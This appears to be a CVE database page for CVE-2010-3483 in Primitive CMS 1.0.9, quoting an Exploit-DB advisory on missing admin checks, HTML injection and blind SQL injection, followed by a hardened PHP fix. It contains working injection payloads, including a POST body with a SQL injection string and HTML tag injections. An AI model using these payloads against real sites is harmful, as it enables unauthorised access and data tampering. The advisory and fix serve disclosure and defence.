CVE-2010-3483
Description
cms_write.php in Primitive CMS 1.0.9 does not properly restrict access, which allows remote attackers to gain administrative privileges via a direct request. NOTE: this vulnerability can be leveraged to conduct cross-site scripting attacks, as demonstrated using the (1) title, (2) content, and (3) menutitle parameters.
Mitigations
No mitigations published for this CVE yet.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
primitive CMS 1.0.9 - Multiple Vulnerabilities
# Exploit Title: Primitive CMS 1.0.9 Multiple Vulnerabilities
# Date: 20.09.2010
# Author: Stephan Sattler // Solidmedia.de
# Software Website: http://www.bouzouste.info/
# Software Link: http://www.bouzouste.info/link/click.php?id=1
# Version: 1.0.9
[Vulnerability 1]
# Unauthorized Access
Url: http://[site]/[cmspath]/cms_write.php
In cms_write.php there is no check whether the user has administration rights.
Because of that, there are 2 more vulnerabilities.
[Vulnerability 2]
# Html Injection
Url: http://[site]/[cmspath]/cms_write.php
Vulnerable Code (cms_write.php line 13-25):
```php
// Original vulnerable code as posted: request parameters are taken unvalidated
// (unquoted array keys as in the original) and interpolated straight into SQL.
$title=$_POST[title];
$content=$_POST[content];
$menutitle=$_POST[menutitle];
$sql="INSERT INTO `prim_page` ( `id` , `title` , `content`, `menutitle` ) VALUES ('', '$title', '$content', '$menutitle')";
mysql_query($sql);
```
The title, menu title and content a user can submit are inserted directly into
the database and then inserted into the HTML code on the page without
any sanitizing at all.
Example for the Title: </title><h1>Testtitle</h1>
Example for the Menu-Title: </a><h2>Menutitle</h2>
[Vulnerability 3]
# Blind SQL-Injection // PoC
Url: http://[site]/[cmspath]/cms_write.php
Vulnerable Code (cms_write.php line 13-16):
```php
// Original vulnerable code as posted: the existence check interpolates
// user input into the WHERE clause, so a crafted menutitle alters the query.
$title=$_POST[title];
$menutitle=$_POST[menutitle];
$sqlcheck="SELECT * FROM prim_page WHERE title='$title' or menutitle='$menutitle' ";
```
Postdata for Injection: title=&menutitle=home' AND (SELECT 1)='1&content=&submit=OK
One can inject via title or menutitle; both are vulnerable. On success, you'll see the message: "H selida yparxei"
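The three issues above share one fix pattern: authorise before writing, bind parameters instead of interpolating them, and encode on output. The following hardened handler is an added example, not Primitive CMS code or the author's; it assumes a session flag `$_SESSION['is_admin']` set at login, a PDO connection, and an auto-increment `id` column, all of which are assumptions.

```php
<?php
// Added example (not Primitive CMS code): hardened replacement for the
// cms_write.php logic quoted in the advisory. Session flag, DSN and
// credentials are assumptions.
session_start();

// Vulnerability 1: the original had no authorisation check at all.
if (empty($_SESSION['is_admin'])) {
    http_response_code(403);
    exit('Forbidden');
}

// Vulnerability 3: never interpolate request data into SQL; bind it.
$title     = (string)($_POST['title'] ?? '');
$content   = (string)($_POST['content'] ?? '');
$menutitle = (string)($_POST['menutitle'] ?? '');

$pdo = new PDO('mysql:host=localhost;dbname=cms;charset=utf8mb4', 'cms_user', 'secret', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepares
]);

// Same existence check as the original, now with bound parameters: a value
// such as "home' AND (SELECT 1)='1" is compared literally, not parsed as SQL.
$check = $pdo->prepare('SELECT 1 FROM prim_page WHERE title = ? OR menutitle = ?');
$check->execute([$title, $menutitle]);
if ($check->fetchColumn() !== false) {
    exit('Page already exists');
}

// id is assumed to be auto-increment, so it is omitted from the insert.
$insert = $pdo->prepare('INSERT INTO prim_page (title, content, menutitle) VALUES (?, ?, ?)');
$insert->execute([$title, $content, $menutitle]);

// Vulnerability 2: stored values were echoed raw into HTML. Encode at the
// point of output, so "</title><h1>Testtitle</h1>" renders as literal text.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

echo '<title>' . h($title) . '</title>';
echo '<a href="#">' . h($menutitle) . '</a>';
echo '<div>' . h($content) . '</div>';
```

Storing the raw value and encoding on output (rather than sanitising on input) keeps the data intact while making the injected tags inert wherever they are rendered.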
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| bouzouste | primitive_cms | 1.0.9 | |
References
- http://packetstormsecurity.org/1009-exploits/primitive-sqlxss.txt
- http://secunia.com/advisories/41515
- http://www.exploit-db.com/exploits/15064
- http://www.vupen.com/english/advisories/2010/2458
CWEs
CWE-264